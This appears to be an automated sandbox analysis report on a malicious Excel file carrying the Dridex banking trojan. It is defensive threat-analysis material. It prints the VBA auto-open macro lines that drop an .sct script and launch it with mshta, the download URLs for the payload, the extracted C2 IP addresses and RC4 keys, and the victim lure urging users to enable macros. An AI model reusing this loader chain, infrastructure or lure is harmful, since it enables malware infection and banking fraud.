Play interactive tour

Edit tour

Windows Analysis Report 4TWEQh2HJb

Overview

General Information

Sample Name:	4TWEQh2HJb (renamed file extension from none to xls)
Analysis ID:	448885
MD5:	40425d09e54ff26289dd074649f0cad9
SHA1:	ae7e4df26092d9acf01b732c8144f0170ccc6556
SHA256:	6f8f1b26324ea0f3f566fbdcb4a61eb92d054ccf0300c52b3549c774056b8f02
Tags:	excelxlsx
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Document exploit detected (creates forbidden files)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document exploit detected (process start blacklist hit)

Machine Learning detection for dropped file

Machine Learning detection for sample

Microsoft Office creates scripting files

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Tries to detect virtualization through RDTSC time measurements

Uses known network protocols on non-standard ports

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2820 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

mshta.exe (PID: 2104 cmdline: mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct' MD5: 95828D670CFD3B16EE188168E083C3C5)

qDialogMainChartType.exe (PID: 3028 cmdline: C:\ProgramData\qDialogMainChartType.exe MD5: EA91555829C1DFDFD47709496461C5D6)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22202, "C2 list": ["202.29.60.34:443", "66.175.217.172:13786", "78.46.78.42:9043"], "RC4 keys": ["RQTJGOuDHeSyUCWzdNRZi3fWMitWY9aTc", "2UMW8pusQXiNJDgmuPITkf4TmrOt3Y13lRDWnjBuu16JkzjIG6gNuckQDkiut9pzQHVGfFdlT"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.qDialogMainChartType.exe.10000000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct', CommandLine: mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct', CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2820, ProcessCommandLine: mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct', ProcessId: 2104

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.qDialogMainChartType.exe.10000000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 22202, "C2 list": ["202.29.60.34:443", "66.175.217.172:13786", "78.46.78.42:9043"], "RC4 keys": ["RQTJGOuDHeSyUCWzdNRZi3fWMitWY9aTc", "2UMW8pusQXiNJDgmuPITkf4TmrOt3Y13lRDWnjBuu16JkzjIG6gNuckQDkiut9pzQHVGfFdlT"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

ReversingLabs: Detection: 30%

Multi AV Scanner detection for submitted file

Show sources

Source: 4TWEQh2HJb.xls

Virustotal: Detection: 27%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: 4TWEQh2HJb.xls

Joe Sandbox ML: detected

Source: 3.2.qDialogMainChartType.exe.10000000.3.unpack

Avira: Label: TR/Dropper.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: wntdll.pdb source: qDialogMainChartType.exe, 00000003.00000003.2117450423.000000007DE80000.00000004.00000001.sdmp
Source:	Binary string: wshom.pdb source: mshta.exe, 00000002.00000002.2363567124.0000000002730000.00000002.00000001.sdmp
Source:	Binary string: Gpernfedeefe.pdb source: mshta.exe, 00000002.00000003.2105631020.0000000004D5B000.00000004.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000000.2105589757.0000000010015000.00000002.00020000.sdmp, qDialogMainChartType.exe.2.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\qRangeAutoFormatLocalFormat3.sct

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Source: global traffic

DNS query: name: onlinefastsolutions.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 202.29.60.34:443
Source: Malware configuration extractor	IPs: 66.175.217.172:13786
Source: Malware configuration extractor	IPs: 78.46.78.42:9043

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 8088
Source: unknown	Network traffic detected: HTTP traffic on port 8088 -> 49165

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.15.12Date: Wed, 14 Jul 2021 18:00:06 GMTContent-Type: application/octet-streamContent-Length: 167936Connection: keep-aliveLast-Modified: Wed, 14 Jul 2021 13:48:51 GMTETag: "60eeeb43-29000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ff 81 78 c1 bb e0 16 92 bb e0 16 92 bb e0 16 92 bb e0 17 92 89 e0 16 92 b2 98 85 92 98 e0 16 92 bb e0 16 92 ba e0 16 92 b6 b2 ca 92 ba e0 16 92 b6 b2 cd 92 ba e0 16 92 b6 b2 c8 92 ba e0 16 92 52 69 63 68 bb e0 16 92 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c4 0c f0 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 40 01 00 00 50 01 00 00 00 00 00 f0 3e 01 00 00 10 00 00 00 50 01 00 00 00 00 10 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 02 00 00 10 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 52 01 00 5d 00 00 00 ec 52 01 00 68 01 00 00 00 80 02 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 01 00 00 00 10 51 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f7 38 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 0c 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 19 01 00 00 60 01 00 00 10 01 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ad 04 00 00 00 80 02 00 00 10 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 01 00 00 00 90 02 00 00 10 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 78.46.78.42 78.46.78.42
Source: Joe Sandbox View	IP Address: 202.29.60.34 202.29.60.34
Source: Joe Sandbox View	IP Address: 66.175.217.172 66.175.217.172

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: CMRU-AS-APChiangmaiRajabhatUniversityTH CMRU-AS-APChiangmaiRajabhatUniversityTH

Source: global traffic

HTTP traffic detected: GET /tpls/file3.bin HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: qWK3FM3Host: onlinefastsolutions.com:8088

Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: onlinefastsolutions.com

Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://buyer-remindment.com:8088/css/file7.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://buyer-remindment.com:8088/fonts/file8.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://buyer-remindment.com:8088/tpls/file4.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	String found in binary or memory: http://buyer-remindment.com:8088/tpls/file4.bin:
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://fasteasyupdates.com:8088/vendors/file4.bin
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.comQ
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://insiderushings.com:8088/js/file13.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	String found in binary or memory: http://insiderushings.com:8088/js/file13.binj
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://onlinefastsolutions.com:8088/images/details.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/images/details.binG
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://onlinefastsolutions.com:8088/images/file13.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://onlinefastsolutions.com:8088/js/file1.bin
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/js/file1.binT
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.2369723384.0000000004D00000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.2362918799.00000000001BF000.00000004.00000020.sdmp, mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.bin
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binQ
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binX
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binc
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.bind
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://paymentadvisry.com:8088/wp-theme/file7.bin
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	String found in binary or memory: http://paymentadvisry.com:8088/wp-theme/file7.bin3.sct
Source: mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlt
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.bethmardutho.org.P
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.c-and-g.co.jp
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.ncst.ernet.in/~rkjoshi
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com;Copyright
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 3.2.qDialogMainChartType.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing at the notification yellow bat i 18 11 1 19 2.And click Enable Content in next noti
Source: Screenshot number: 4	Screenshot OCR: Enable Content in next notification. 'S :: : 3.OR Use DecryptTooi from https://shop.globalsign.com
Source: Document image extraction number: 2	Screenshot OCR: Enable Editing at the notification yellow bar. 2.And click Enable Content in next notification. 3.
Source: Document image extraction number: 2	Screenshot OCR: Enable Content in next notification. 3.OR Use DecryptTooi from https://shop.globalsign.com/en/docu

Document contains an embedded VBA macro which may execute processes

Show sources

Source: 4TWEQh2HJb.xls

OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: 4TWEQh2HJb.xls	OLE, VBA macro line: Set qLine = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
Source: 4TWEQh2HJb.xls	OLE, VBA macro line: Set qLine = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
Source: 4TWEQh2HJb.xls	OLE, VBA macro line: With CreateObject("Wscript.Shell")
Source: 4TWEQh2HJb.xls	OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Source: 4TWEQh2HJb.xls	OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String createtextfile: Set qLine = . CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String environ: Set qLine = . CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String wscript: With CreateObject("Wscript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String environ: . Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String mshta: . Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))

Microsoft Office creates scripting files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\qRangeAutoFormatLocalFormat3.sct

Jump to behavior

Source: C:\ProgramData\qDialogMainChartType.exe

Process Stats: CPU usage > 98%

Source: C:\ProgramData\qDialogMainChartType.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\ProgramData\qDialogMainChartType.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10012840 NtAllocateVirtualMemory,
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1001223C NtDelayExecution,
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1001326C NtProtectVirtualMemory,
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1000BB88 NtClose,

Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10010754
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10011460
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1000846C
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10001494
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1000A52C
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10011D58
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10019348

Source: 4TWEQh2HJb.xls	OLE, VBA macro line: Sub WorkBook_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open

Source: 4TWEQh2HJb.xls

OLE indicator, VBA macros: true

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: qDialogMainChartType.exe.2.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@5/2@2/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREA9C.tmp

Jump to behavior

Source: 4TWEQh2HJb.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 4TWEQh2HJb.xls

Virustotal: Detection: 27%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct'
Source: C:\Windows\System32\mshta.exe	Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct'
Source: C:\Windows\System32\mshta.exe	Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: wntdll.pdb source: qDialogMainChartType.exe, 00000003.00000003.2117450423.000000007DE80000.00000004.00000001.sdmp
Source:	Binary string: wshom.pdb source: mshta.exe, 00000002.00000002.2363567124.0000000002730000.00000002.00000001.sdmp
Source:	Binary string: Gpernfedeefe.pdb source: mshta.exe, 00000002.00000003.2105631020.0000000004D5B000.00000004.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000000.2105589757.0000000010015000.00000002.00020000.sdmp, qDialogMainChartType.exe.2.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack

